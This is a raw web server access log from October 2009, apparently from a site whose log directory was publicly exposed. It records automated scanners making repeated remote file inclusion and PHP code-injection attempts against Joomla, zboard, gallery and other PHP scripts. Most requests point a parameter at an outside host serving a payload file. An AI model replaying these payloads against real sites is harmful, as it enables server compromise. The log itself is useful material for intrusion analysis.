220.100.96.65 - - [18/Oct/2009:03:13:53 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=uid=48(apache)%20gid=4294967295%20%BD%EA%C2%B0%A5%B0%A5%EB%A1%BC%A5%D7=4294967295%0A? HTTP/1.1" 404 246 "-" "libwww-perl/5.65"
213.25.33.99 - - [18/Oct/2009:03:14:13 -0400] "GET /logs/access_log.Q109061400//com_mp3_allopass/allopass.php?mosConfig_live_site=http://ulsanmis.pe.kr/bbs/admin/fx29id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
89.108.122.160 - - [18/Oct/2009:03:15:11 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fileden.com/files/2009/10/16/2605501/IDtest.txt??? HTTP/1.1" 404 238 "-" "Mozilla/3.0 (OS/2; U)"
89.108.122.160 - - [18/Oct/2009:03:15:16 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.fileden.com/files/2009/10/16/2605501/IDtest.txt??? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
220.100.96.65 - - [18/Oct/2009:03:16:42 -0400] "GET /logs/error_log.Q109071000//modules/4nAlbum/public/displayCategory.php?basepath=uid=48(apache)%20gid=4294967295%20%BD%EA%C2%B0%A5%B0%A5%EB%A1%BC%A5%D7=4294967295%0A? HTTP/1.1" 404 267 "-" "libwww-perl/5.65"
174.143.3.188 - - [18/Oct/2009:03:16:47 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
174.143.3.188 - - [18/Oct/2009:03:16:47 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
174.143.3.188 - - [18/Oct/2009:03:16:48 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
174.143.3.188 - - [18/Oct/2009:03:16:48 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
72.30.78.230 - - [18/Oct/2009:03:17:10 -0400] "GET /logs/access_log.Q109041300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.38.18.81 - - [18/Oct/2009:03:17:15 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://triton.100free.com/mic22? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
65.38.18.81 - - [18/Oct/2009:03:17:15 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://triton.100free.com/mic22? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
123.125.66.94 - - [18/Oct/2009:03:18:15 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [18/Oct/2009:03:18:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.17.54 - - [18/Oct/2009:03:19:33 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:03:19:33 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:03:19:33 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:03:19:37 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:03:19:42 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:03:19:42 -0400] "GET /logs/error_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:03:19:42 -0400] "GET /logs/error_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:03:19:44 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:03:19:47 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:03:19:59 -0400] "GET /logs/error_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:03:20:01 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.181.7.94 - - [18/Oct/2009:03:21:48 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
206.225.23.4 - - [18/Oct/2009:03:21:54 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:21:54 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:21:54 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:21:54 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:21:54 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:21:54 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:21:54 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:21:59 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:22:00 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:22:00 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:22:00 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:22:05 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:22:42 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:22:42 -0400] "GET /logs//galeria.php?start=0&kategoria=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:22:42 -0400] "GET //galeria.php?start=0&kategoria=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
204.14.90.22 - - [18/Oct/2009:03:22:44 -0400] "GET /zboard/include/write.php?dir=http://ownzz.100free.com/idzim.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.831"
64.27.9.117 - - [18/Oct/2009:03:22:44 -0400] "GET //galeria.php?start=0&kategoria=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:22:44 -0400] "GET /logs//galeria.php?start=0&kategoria=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:22:44 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:03:22:52 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:03:22:52 -0400] "GET /logs/access_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:03:22:52 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:23:02 -0400] "GET /logs/error_log.Q109071800%20%20//galeria.php?start=0&kategoria=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:23:04 -0400] "GET /logs/error_log.Q109071800%20%20//galeria.php?start=0&kategoria=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.249.71.51 - - [18/Oct/2009:03:22:38 -0400] "GET /logs/error_log.Q109081100 HTTP/1.1" 200 2933596 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.17.19.172 - - [18/Oct/2009:03:23:10 -0400] "GET /logs/error_log.Q109092300%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:03:23:10 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:03:23:20 -0400] "GET /logs/error_log.Q109092200%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:03:23:20 -0400] "GET /logs/error_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:03:23:25 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.17.54 - - [18/Oct/2009:03:23:25 -0400] "GET /logs/error_log.Q109092300//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:03:23:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.170.119.1 - - [18/Oct/2009:03:23:33 -0400] "GET /logs/SSI.php?sourcedir=http://www.medisite.fr/id???? HTTP/1.1" 404 210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
202.170.119.1 - - [18/Oct/2009:03:23:33 -0400] "GET /SSI.php?sourcedir=http://www.medisite.fr/id???? HTTP/1.1" 404 205 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
206.225.23.4 - - [18/Oct/2009:03:23:35 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:23:35 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:23:43 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:23:43 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:03:23:57 -0400] "GET /logs/error_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:23:58 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:23:58 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:03:23:59 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:03:24:53 -0400] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.19.172 - - [18/Oct/2009:03:24:53 -0400] "GET /logs/error_log.Q109092300//index.php?DOCUMENT_ROOT=http://www.powervictory.org//zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:03:26:10 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:03:26:10 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:03:26:10 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:03:26:10 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:26:40 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:26:40 -0400] "GET /logs/access_log.Q109071400%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:26:40 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:26:52 -0400] "GET /logs/access_log.Q109063000%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:27:47 -0400] "GET /logs/access_log.Q109071400%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:27:47 -0400] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:27:47 -0400] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.251.147.194 - - [18/Oct/2009:03:27:48 -0400] "GET /logs/access_log.Q109063000%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://banlat.ac.th/images/banner1.jpg?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
220.100.96.65 - - [18/Oct/2009:03:28:16 -0400] "GET /zboard/include/write.php?dir=uid=48(apache)%20gid=4294967295%20%BD%EA%C2%B0%A5%B0%A5%EB%A1%BC%A5%D7=4294967295%0A? HTTP/1.1" 404 222 "-" "libwww-perl/5.65"
174.143.3.188 - - [18/Oct/2009:03:28:18 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
174.143.3.188 - - [18/Oct/2009:03:28:18 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
174.143.3.188 - - [18/Oct/2009:03:28:18 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
174.143.3.188 - - [18/Oct/2009:03:28:18 -0400] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
209.59.12.99 - - [18/Oct/2009:03:28:28 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.27.9.117 - - [18/Oct/2009:03:30:09 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:30:09 -0400] "GET /logs/error_log.Q109071800//galeria.php?start=0&kategoria=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:30:12 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:30:12 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:30:12 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:30:12 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:30:12 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:30:12 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:30:12 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:30:15 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:30:17 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.27.9.117 - - [18/Oct/2009:03:30:17 -0400] "GET /logs/error_log.Q109071800//galeria.php?start=0&kategoria=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:30:20 -0400] "GET //include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:30:20 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:30:20 -0400] "GET /logs/error_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:03:30:20 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
